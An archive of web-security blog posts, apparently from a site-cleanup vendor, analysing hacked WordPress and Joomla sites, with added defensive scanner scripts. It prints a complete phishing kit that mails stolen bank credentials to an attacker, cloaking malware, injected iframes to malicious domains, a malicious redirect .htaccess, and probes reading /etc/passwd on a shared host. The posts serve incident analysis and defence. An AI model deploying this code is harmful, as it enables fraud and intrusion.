Walmart community web site still hacked

Remember a few weeks ago when we reported that the official web site for the Walmart Community Action Network was hacked and hosting SEO spam?

Well, it seems that they removed the previous spam and also upgraded WordPress to latest version. Good for them!

However, I was checking the site out of curiosity today and it has another type of spam now:


samsung delve free ringtones
ringtones for prepaid cell phone
free bollywood ringtones
buy ringtone

This is the report from our scanner:

Instead of the “movie” spam, now they have ringtone spam pointing to a site that is probably hacked too. An interesting thing is that if you search for these keywords you will find them on a few different sites and even on fake LinkedIn profiles: http://www.linkedin.com/in/downloadringtones

As for the location where it is hidden: last time it was inside their footer.php file. I checked it again and the new spam is also there ( http://www.walmartcommunity.com/wp-content/themes/walcan/footer.php ).

So it looks like the attackers left a backdoor (or stole their passwords again) and they are using that to get in (even after the previous spam was removed and WordPress upgraded).

Security tip: If you just remove the visible malware/spam and do not do a full scan/recovery of your site and fix the underlying problem, you will get infected again.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

SunTrust phishing – case study

Last week we were called to fix a Joomla site that got blacklisted and had some malware on it. Nothing unusual as we do that many times a day. However, after some analysis of the site, we found a directory that didn’t look quite right.

That’s what we found: /public_html/components/com_jsecure/SunTrust. Hmm… a “SunTrust” directory? That shouldn’t be there.

When we looked at the content, it had 4 files:

$ ls -la 
index2.htm
index.htm
login.php
server.php

The index.htm was similar to the login page from SunTrust and asked for the user/pass of the person accessing it:


When the user submitted the form, it would load the login.php script:

<?php
// login.php: the script the fake SunTrust login form posts to.
$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "USER ID : ".$_POST['uid']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

// The captured user name and password are mailed to the attacker's address...
$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
// ...and the victim is sent on to the second form, index2.htm.
if (mail($recipient,$subject,$message,$headers))
{
    header("Location: index2.htm");
}
else
{
    echo "ERROR! Please go back and try again.";
}

This script sends the victim’s user name and password to peculiarhome@sify.com. But that’s not all: after that, it loads index2.htm, which asks the user for every piece of information possible:

Once the form is completed, the server.php script is loaded to send all that information to peculiarhome@sify.com:

<?php
// server.php: the script the second form (index2.htm) posts to.
$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Name On Account: ".$_POST['ucxATMCredentials:txtNAME']."\n";
$message .= "Social Security Number/TAX ID: ".$_POST['ucxATMCredentials:txtSSN']."\n";
$message .= "Account Number: ".$_POST['ucxATMCredentials:txtLast4DigitsOfAcct']."\n";
$message .= "Card Number: ".$_POST['ucxATMCredentials:txtATMPAN']."\n";
$message .= "Pin Number: ".$_POST['ucxATMCredentials:txtATMPin']."\n";
$message .= "Cvv2: ".$_POST['ucxATMCredentials:txtATMCvv2']."\n";
$message .= "Expiry Date: ".$_POST['ucxATMCredentials:txtExp']."\n";
$message .= "Mother's Maiden Name: ".$_POST['ucxATMCredentials:txtMMN']."\n";
$message .= "Date of Birth: ".$_POST['ucxATMCredentials:txtDOB']."\n";
$message .= "Email Address: ".$_POST['ucxATMCredentials:txtEmail']."\n";
$message .= "Email Password: ".$_POST['ucxATMCredentials:txtPass']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

// Everything collected is mailed to the same attacker address...
$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank info";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
// ...and the victim is redirected to the real bank site so nothing looks wrong.
if (mail($recipient,$subject,$message,$headers))
{
    header("Location: https://www.suntrust.com/");
}
else
{
    echo "ERROR! Please go back and try again.";
}

Very nasty. We looked at all the logs and since this directory was recent, we believe no one got harmed through it.

Solving phishing

For the banks out there, I recommend that you check your logs and look at the referrers of the images being loaded. In the example we analyzed, the images and the CSS files were being loaded directly from the SunTrust site, so if they had been analyzing their logs they would have detected it.
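One way to do that referrer check, as an added example that is not part of the original post: the script below parses Apache “combined” access log lines, keeps only the requests for static assets (images, CSS, icons, scripts), and counts the foreign hosts named in their Referer header. A phishing page that hotlinks the bank’s own assets shows up as a host that is not one of the bank’s. The log format, the OWN_HOSTS set and the sample log lines are assumptions constructed for the demo; they are not real SunTrust traffic.

```python
"""Find third-party pages hotlinking a site's images and CSS from its access logs.

Added example (not from the post). Assumes Apache "combined" log format and that
the bank's own hostnames are the ones in OWN_HOSTS. SAMPLE_LOG is constructed.
"""
import re
from collections import Counter
from urllib.parse import urlparse

# Apache combined format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Hostnames that legitimately embed the bank's assets (assumption for the demo).
OWN_HOSTS = {"www.suntrust.com", "suntrust.com"}

# Static assets a phishing kit typically hotlinks instead of copying.
ASSET_RE = re.compile(r"\.(png|gif|jpe?g|css|ico|js)$", re.IGNORECASE)

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def hotlinking_referers(lines, own_hosts=OWN_HOSTS):
    """Count asset requests per foreign Referer host: {host: hits}."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if not ASSET_RE.search(rec["path"].split("?", 1)[0]):
            continue                      # not a static asset
        ref = rec["referer"]
        if ref in ("", "-"):
            continue                      # direct request or suppressed referer
        host = urlparse(ref).hostname
        if host and host.lower() not in own_hosts:
            hits[host.lower()] += 1
    return hits

# Constructed sample: two legitimate asset hits, two from a phishing kit on a hacked
# Joomla site (path modelled on the one in the post), one page view with no referer.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2010:10:00:01 -0400] "GET /images/logo.gif HTTP/1.1" 200 5123 "https://www.suntrust.com/" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2010:10:00:02 -0400] "GET /css/login.css HTTP/1.1" 200 2210 "https://www.suntrust.com/portal/login" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2010:10:05:10 -0400] "GET /images/logo.gif HTTP/1.1" 200 5123 "http://hacked-joomla.example/components/com_jsecure/SunTrust/index.htm" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2010:10:05:11 -0400] "GET /css/login.css?v=3 HTTP/1.1" 200 2210 "http://hacked-joomla.example/components/com_jsecure/SunTrust/index.htm" "Mozilla/5.0"
198.51.100.9 - - [10/Apr/2010:10:06:00 -0400] "GET /portal/login HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for host, n in hotlinking_referers(SAMPLE_LOG.splitlines()).most_common():
        print(f"{n:5d}  {host}")
```

Run it against a real log by passing the open file object instead of SAMPLE_LOG.splitlines(); every host it prints is a page somewhere that is embedding the bank’s own images, which is exactly what a phishing copy does.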

For the web masters and site owners out there: Keep your sites updated, use good passwords and monitor your sites!

As always, if you need help to recover from web attacks or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

A new place to hide web-based malware: php.ini + cgi-bin

We got a call this weekend from a desperate site owner that had just found out that his site was hacked and hosting malware. He was fairly technical and checked everywhere for it. He even reverted back to an old backup he knew was clean, but the problem persisted.

When he explained the problem to me, I was 99% sure that it was something inserted in the .htaccess file. Well, I was wrong. I checked the site as well and didn’t find anything hidden in the normal places.

I then remembered a report from another user, and one from stopmalvertising.com, about malware being hidden inside the cgi-bin directory.

*Most people forget to check the cgi-bin directory because it is outside the htdocs and not targeted that often.

When we checked that directory we found a php.ini containing:

auto_append_file = "/home/user/USER/cgi-bin/security.cgi"

What this does is append the output of this security.cgi file to every PHP script. When we checked that file, this is what it looked like:

<?php
// security.cgi: appended to every PHP page through auto_append_file.
// It decides whether the visitor is a real browser or a crawler/scanner so the
// payload can be shown to humans only (cloaking). eregi() is used throughout;
// it is deprecated since PHP 5.3 and removed in PHP 7.
function detectBot(){
    global $is_human,$stop_agent_detected,$stop_ip_detected,$detected_str;
    // Source IP ranges of search engines and known scanners: never served the payload.
    $stop_ips_masks = array(
        "66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255
        "74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255
        "65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255
        "74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255
        "67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255
        "72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255
        "38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255
        "93\.172\.94\.227", // MacFinder
        "212\.100\.250\.218", // Wells Search II
        "71\.165\.223\.134", // Indy Library
        "70\.91\.180\.25",
        "65\.93\.62\.242",
        "74\.193\.246\.129",
        "213\.144\.15\.38",
        "195\.92\.229\.2",
        "70\.50\.189\.191",
        "218\.28\.88\.99",
        "165\.160\.2\.20",
        "89\.122\.224\.230",
        "66\.230\.175\.124",
        "218\.18\.174\.27",
        "65\.33\.87\.94",
        "67\.210\.111\.241",
        "81\.135\.175\.70",
        "64\.69\.34\.134",
        "89\.149\.253\.169"
    );
    // User-Agent substrings that mark crawlers, HTTP libraries and WordPress pingbacks.
    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress");

    $_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent\:[\s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]);

    $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";
    // 1. Block by source IP.
    foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("^{$stop_ip_mask}$", defineIP())) {
        $is_human = false; $stop_ip_detected = true; $detected_str = "by ip"; break;
    }
    // 2. Block by User-Agent keyword.
    if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$_SERVER["HTTP_USER_AGENT"]) !== false){
        $is_human = false; $stop_agent_detected = true; $detected_str = "by agent"; break;
    }
    // 3. A browser's User-Agent starts with at least five letters ("Mozilla", "Opera", ...).
    if($is_human and !eregi("^[a-zA-Z]{5,}", @$_SERVER["HTTP_USER_AGENT"])) {
        $is_human = false; $stop_agent_detected = true; $detected_str = "not human agent";
    }
}
// Client address, taking X-Forwarded-For when a proxy supplies it.
function defineIP(){
    if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])) return $_SERVER["HTTP_X_FORWARDED_FOR"];
    else return $_SERVER['REMOTE_ADDR'];
}

detectBot();

// The payload runs once per visitor (no "cook" cookie yet) and only for "humans".
// The body of this block is not shown in the post.
if(!isset($_COOKIE["cook"]) && $is_human)
{
}

Exactly the same as the counter.cgi reported by stopmalvertising.com.

So if you ever have to clean a hacked web site, don’t forget to check the cgi-bin directory and the php.ini file.
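To make that check repeatable, here is an added scanner (example code, not from this post or from stopmalvertising.com) that walks a site tree and reports every auto_append_file / auto_prepend_file directive it finds. It goes a little beyond the php.ini case in the post: it also reads .user.ini files and php_value lines in .htaccess, which set the same PHP options. The directory layout it builds for the demo is constructed, and the directive it plants is the one quoted above.

```python
"""Scan a site tree for PHP auto_append_file / auto_prepend_file directives.

Added example (not from the post). Looks at every php.ini, .user.ini and
.htaccess under a root and reports directives that make PHP silently include
another file into every script it runs. The tree built by scan_sample_site()
is constructed for the demo.
"""
import os
import re
import tempfile

CONFIG_NAMES = {"php.ini", ".user.ini", ".htaccess"}

# php.ini / .user.ini form:   auto_append_file = "/path/to/file"
# .htaccess (mod_php) form:   php_value auto_append_file /path/to/file
DIRECTIVE_RE = re.compile(
    r"^\s*(?:php_(?:admin_)?value\s+)?(auto_(?:append|prepend)_file)\s*=?\s*[\"']?([^\"'\s;]+)",
    re.IGNORECASE | re.MULTILINE,
)

def find_auto_includes(root):
    """Return [(config path, directive, target file)] for every directive under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in CONFIG_NAMES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue                  # unreadable config file: skip it
            for m in DIRECTIVE_RE.finditer(text):
                findings.append((path, m.group(1).lower(), m.group(2)))
    return findings

def build_sample_site(base):
    """Constructed layout: clean .htaccess in public_html, planted php.ini in cgi-bin."""
    htdocs = os.path.join(base, "public_html")
    cgi = os.path.join(base, "cgi-bin")
    os.makedirs(htdocs)
    os.makedirs(cgi)
    with open(os.path.join(htdocs, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\nRewriteRule ^blog/(.*)$ index.php?p=$1 [L]\n")
    with open(os.path.join(cgi, "php.ini"), "w") as fh:
        fh.write('auto_append_file = "/home/user/USER/cgi-bin/security.cgi"\n')
    with open(os.path.join(cgi, "security.cgi"), "w") as fh:
        fh.write("<?php /* stand-in for the planted file */ ?>\n")

def scan_sample_site():
    """Build the sample tree in a temp dir, scan it, return findings relative to the root."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return [
            (os.path.relpath(path, tmp).replace(os.sep, "/"), directive, target)
            for path, directive, target in find_auto_includes(tmp)
        ]

if __name__ == "__main__":
    for cfg, directive, target in scan_sample_site():
        print(f"{cfg}: {directive} -> {target}")
```

Point find_auto_includes() at the account’s home directory rather than only at the document root, since the whole point of the post is that the php.ini lived in cgi-bin, outside htdocs. Also run `php -i | grep auto_` once on the server: that shows the value PHP actually picked up, whichever file set it.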

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Network Solutions update and some numbers

I am getting a lot of questions, via email and via the comments, about what to do if a site hosted at Network Solutions currently has malware or is blacklisted.

Network Solutions issued an update explaining what to do: http://blog.networksolutions.com/2010/what-to-do-when-your-site-is-showing-a-malware-warning-page/

They partnered up with us and we are scanning any Network Solutions site for free for malware and other security issues. Follow the instructions on their blog to find out what to do.

Also, an interesting statistic from Google Safe Browsing:

Of the 114590 site(s) we tested on this network over the past 90 days, 2669 site(s), .., served content that resulted in malicious software being downloaded and installed without user consent.

So a total of 2,669 sites at Network Solutions got blacklisted in the last few days. That’s 2% of all the sites they are hosting (note that not all the affected sites were blacklisted by Google).

Hostek is putting their customers at risk

If you are hosting your site at Hostek.com, you are probably at a higher risk of being hacked. Why? Because they do not do the proper separation of accounts internally, so anyone can access the pages of everyone else.

How do we know that? We were helping a friend with his site over there and when we checked their permissions, we found a big (BIG) security hole on Hostek. Every PHP script is executed with the permissions of the user “nobody” (used by Apache), and every site allows the user “nobody” to access its files.

It means that any user can access the files of everyone else. Even worse, under some circumstances you can add and even modify their files.

Analysis

When we realized that the PHP scripts were being executed as the user nobody, we did a simple PHP script to verify that:

<?php
echo "verify..\n";
$myloc = `pwd`;
echo "myloc: $myloc\n";
$myid = `id`;
echo "myid: $myid\n";

We got this output:

verify.. myloc: /home/XXX/public_html done
myid: uid=99(nobody) gid=99(nobody) groups=99(nobody)

Uh-oh, the PHP script is being executed as nobody. We also learned that each user probably has their own home directory at /home/[user], with their public web site stored at /home/[user]/public_html.

We then tried an additional check with this script:

<?php
$listofusers = `cat /etc/passwd`;
echo "users:$listofusers\n";

And yes, we got the list of all the users on their shared server (I won’t list the real users to protect them, but every one of them had their home dir at /home/[user] and the shell /usr/local/cpanel/bin/noshell):


users:root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
..

That’s not too bad. What else could we do? Well, we could list the files from everyone else (I won’t show how to do it):


/home/userB/public_html

total 1524
drwxr-x--- 24 userB nobody 4096 Oct 30 01:49 .
drwx--x--x 15 userB actionin 4096 Apr 26 2009 ..
-rw------- 1 userB actionin 16 Apr 11 03:57 .ftpquota
-rw-r--r-- 1 userB actionin 93 Feb 3 2009 LiveSearchSiteAuth.xml
-rw-r--r-- 1 userB actionin 3240 Feb 10 2009 about.php
drwxr-xr-x 2 userB actionin 4096 Nov 30 2007 activate
drwxr-xr-x 7 userB actionin 4096 Mar 10 2009 admin
-rw-r--r-- 1 userB actionin 6243 Feb 5 2009 change_password.php
..

As you can see, the group nobody has the permission to read and execute the public_html directory, so every user can read the files from everyone else.

If that wasn’t bad enough, we were able to cat the passwords from wp-config.php (used by WordPress), configuration.php (used by Joomla) and even .htpasswd used to protect specific directories.

Can it get worse?

What is really bad is that some CMSs (especially WordPress) have a directory that lets users upload files via the web. With WordPress it is wp-content/uploads.

The permissions of this directory allowed the user nobody to add and modify any file in there. So we were able to add files into other people’s site (see test.txt on the screenshot) and even modify anything they had uploaded. Really bad.


And yes, we contacted them and got no reply.

Network Solutions hacked again

Network Solutions is getting hacked again. Just today we were notified of more than 50 sites hacked with the following malware javascript:

If we decode this javascript, we see that it is injecting this iframe from http://corpadsinc.com/grep/ :

document.write(s)   // s decodes to the iframe below
<iframe frameborder="0" onload='if (!this.src){ this.src="http://corpadsinc.com/grep/"; this.height=0; this.width=0;}'></iframe>

Note that this time we are seeing all kinds of sites hacked, from WordPress and Joomla to plain HTML sites.

UPDATE 1: Google is already blacklisting lots of them… Bad day to be a Network Solutions customer.

UPDATE 2: Some sites are also compromised with this encoded javascript:

This injects an iframe from the http://mainnetsoll.com/grep/ domain (the same one used in last week’s attack):

<iframe frameborder="0" onload='if (!this.src){ this.src="http://mainnetsoll.com/grep/"; this.height=0; this.width=0;}'></iframe>

UPDATE 3: Some WordPress sites we were analyzing only had the malware inserted at the cache file from WP-Super-Cache. Everything else was clean.

UPDATE 4: Post from http://stopmalvertising.com explaining their findings on this issue.

UPDATE 5: Network Solutions updated their blog, apologizing to their clients and saying that they are working hard to fix it. Hopefully it will be solved soon.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Walmart web site hacked and hosting spam

A few days ago someone contacted us asking for help to clean up their site. They got hacked and the attacker added a bunch of spam links to it.

We fixed it for them and decided to search for more sites that were also infected. To our surprise, one of Walmart’s official web sites, www.walmartcommunity.com (for their Community Action Network), was among the first results.

If you look at their page source you will see all the spam links:

Die, Mommie, Die! download movie..
Lethal Weapon 2 download movie..
Black Rain download movie
The World Is Not Enough download movie
..

Checking their site with our malware scanner we noticed that all their pages have these spam entries:


It means that the attackers probably injected the spam into one of their template files. After a bit of searching, we found all of it inside footer.php:

We tried to contact them, but only got their automated response (web site help), so hopefully with this post they will fix it. They are running WordPress 2.8.4, which is not that old, so I am assuming they got hacked via stolen FTP/SSH credentials or something like that.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Conditional redirects (or the htaccess malware)

We see all types of malware daily, but one of them seems to cause a lot of confusion to our users (and everyone in general). This is the common question we hear:

“Some users are complaining that when they search for my site on Google, they are redirected to a site full of malware/virus/spam, but when I access, it looks fine. I even scanned it with multiple anti-virus and they didn’t detect anything”

What that means is that someone hacked your site and modified your .htaccess file to redirect users coming from Google to a malware-infested site. Because of that, you end up blacklisted and losing users that can’t reach your site. (well, at least 99% of the time this is the cause).

This is what the modified .htaccess file looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://badsite.com [R,L]

On some sites we even see conditional redirects for users coming from Twitter, MySpace, LinkedIn, etc.:

..
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .blog. [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
..

The reason most desktop anti-virus programs (or malware scanners) won’t detect this when you scan your files is that they don’t understand the .htaccess file and won’t follow the redirection. On Sucuri, this is how we would alert:

How to fix it?

Fixing this redirection is very simple, you just need to delete these entries from your .htaccess file (you can have more than one, so check all your directories) and you are set. However, you still have to verify that you don’t have anything else hidden in there, so do a full scan of your web site to make sure you are clean.

In addition to that, you still need to fix the problem that allowed you to get hacked. Most of the time it means updating your web application (WordPress, Joomla, etc), changing your passwords and cleaning your desktop.
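An added helper for that “check all your directories” step (example code, not Sucuri’s scanner): it parses each .htaccess as runs of RewriteCond lines followed by a RewriteRule and flags only rules that are gated on %{HTTP_REFERER} and send the visitor to an external URL, so the standard WordPress pretty-permalink block is not reported. The .htaccess contents and the directory layout used by sample_scan() are constructed.

```python
"""Find referrer-conditional redirects in .htaccess files.

Added example (not Sucuri's scanner). Parses each .htaccess as RewriteCond
lines followed by a RewriteRule and flags rules gated on %{HTTP_REFERER} that
send the visitor to an external URL. Sample contents and tree are constructed.
"""
import os
import re
import tempfile

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.IGNORECASE)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.IGNORECASE)

def find_referer_redirects(text):
    """Return [(target, [referer patterns])] for each external redirect gated on the Referer."""
    findings = []
    pending = []                  # referer conditions seen since the last RewriteRule
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            pending.append(m.group(1))
            continue
        m = RULE_RE.match(line)
        if m:
            target = m.group(2)
            # An absolute URL as the target is an external redirect whether or not [R] is set.
            if pending and target.lower().startswith(("http://", "https://")):
                findings.append((target, pending))
            pending = []          # RewriteCond lines only apply to the next RewriteRule
    return findings

def scan_tree(root):
    """Check every .htaccess under root; return {relative path: findings} for the bad ones."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = find_referer_redirects(fh.read())
        if found:
            out[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return out

# Constructed: the standard WordPress pretty-permalink block (must not be flagged).
CLEAN_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

# Constructed: a shortened version of the injected block shown in the post.
INFECTED_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule .* http://badsite.com [R,L]
"""

def sample_scan():
    """Clean .htaccess at the root, infected one hidden under wp-content/uploads."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "wp-content", "uploads"))
        with open(os.path.join(tmp, ".htaccess"), "w") as fh:
            fh.write(CLEAN_HTACCESS)
        with open(os.path.join(tmp, "wp-content", "uploads", ".htaccess"), "w") as fh:
            fh.write(INFECTED_HTACCESS)
        return scan_tree(tmp)

if __name__ == "__main__":
    for path, found in sample_scan().items():
        for target, conds in found:
            print(f"{path}: {len(conds)} referer condition(s) -> {target}")
```

Because it keys on the structure (Referer conditions plus an external target) rather than on a keyword list, it also catches the Twitter/MySpace variant above and any new search-engine name the attackers add. A quick manual cross-check is a request with a Google referer, for example `curl -I -e http://www.google.com/ http://yoursite.com/`, which should not return a 3xx to a domain you don’t own.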

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Details on the Network Solutions / WordPress mass hack

Update 1: The attack continues! Now they are using the domain http://mainnetsoll.com/grep/. Make sure to fix your wp-config and change your database password ASAP.

Update 2: A quick fix if you can’t change your database password: set WP_SITEURL inside your wp-config.php. It overrides the value in the database. Just add this line to the file (include the http:// scheme):
define('WP_SITEURL', 'http://yoursite.com');

Update 3: If you are seeing attacks from a different domain, please let us know. If you need help, send us an email and we will try to help asap (use contact@sucuri.net ).

Yesterday we reported a mass infection of WordPress blogs hosted at Network Solutions.

First of all, I must say that the response from Network Solutions was very good. They were active on the forums, responding to users via Twitter and really trying to find and fix the problem. They even sent me an email just after my first post went live to get more information and share notes. That’s what I like to see from a hosting company.

Anyway, we discussed via the phone yesterday and after a long analysis they have nailed the cause of the problem. This is what happened:

  1. WordPress stores the database credentials in plain text in the wp-config.php file.
  2. This configuration file should only be readable by Apache, but some users (well, lots of users) left it readable by anyone (755 instead of 750, in Linux slang).
  3. A malicious user at Network Solutions wrote a script to find those incorrectly configured files.
  4. The same malicious user found hundreds of configuration files with the incorrect permissions and retrieved the database credentials.
  5. He then launched an attack and modified the database of all these blogs. The siteurl for all of them became networkads.net/grep. Easy hack.

So, in the end, everyone can be blamed: WordPress for requiring that the database credentials be stored in clear text; WordPress again for not installing itself securely by default; the users for not securing their blogs; and Network Solutions for allowing this to happen.

I also have to agree with Network Solutions that this problem can happen at any shared host. Not only with WordPress, but with any CMS out there that stores passwords in clear text. If you are affected by this problem (or are on any shared server), change your database credentials ASAP and make sure your configuration file is not readable by everyone else.

*To change the permissions via FTP, just run chmod 750 wp-config.php inside your blog directory.
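The Hostek findings above and the wp-config.php permissions behind this Network Solutions incident come down to the same two checks, which the added script below automates (example code, not from the posts): configuration files holding credentials that group or “other” can read, and upload directories that group or “other” can write. The file names it looks for, the modes suggested in its messages and the sample tree it builds are assumptions for the demo; run audit() against a real document root to get the same report for your own site.

```python
"""Audit a site directory for the permission mistakes described in the posts.

Added example (not from the posts). Reports credential-holding configuration
files that group or "other" can read, and upload directories that group or
"other" can write. File names, suggested modes and the sample tree are
assumptions for the demo.
"""
import os
import stat
import tempfile

SENSITIVE_FILES = {"wp-config.php", "configuration.php", ".htpasswd"}
UPLOAD_DIRS = {"uploads", "upload"}

def audit(root):
    """Return sorted [(relative path, issue)] for every risky mode found under root."""
    issues = []
    for dirpath, dirs, files in os.walk(root):
        for name in files:
            if name not in SENSITIVE_FILES:
                continue
            full = os.path.join(dirpath, name)
            mode = os.stat(full).st_mode
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if mode & stat.S_IROTH:
                issues.append((rel, "world-readable: chmod 750 (or 640)"))
            elif mode & stat.S_IRGRP:
                # 750 is fine when the group is the account's own; on a host where the
                # group is the web server's user (nobody, as at Hostek) it is not.
                issues.append((rel, "group-readable: check that the group is not the web server's"))
        for name in dirs:
            if name not in UPLOAD_DIRS:
                continue
            full = os.path.join(dirpath, name)
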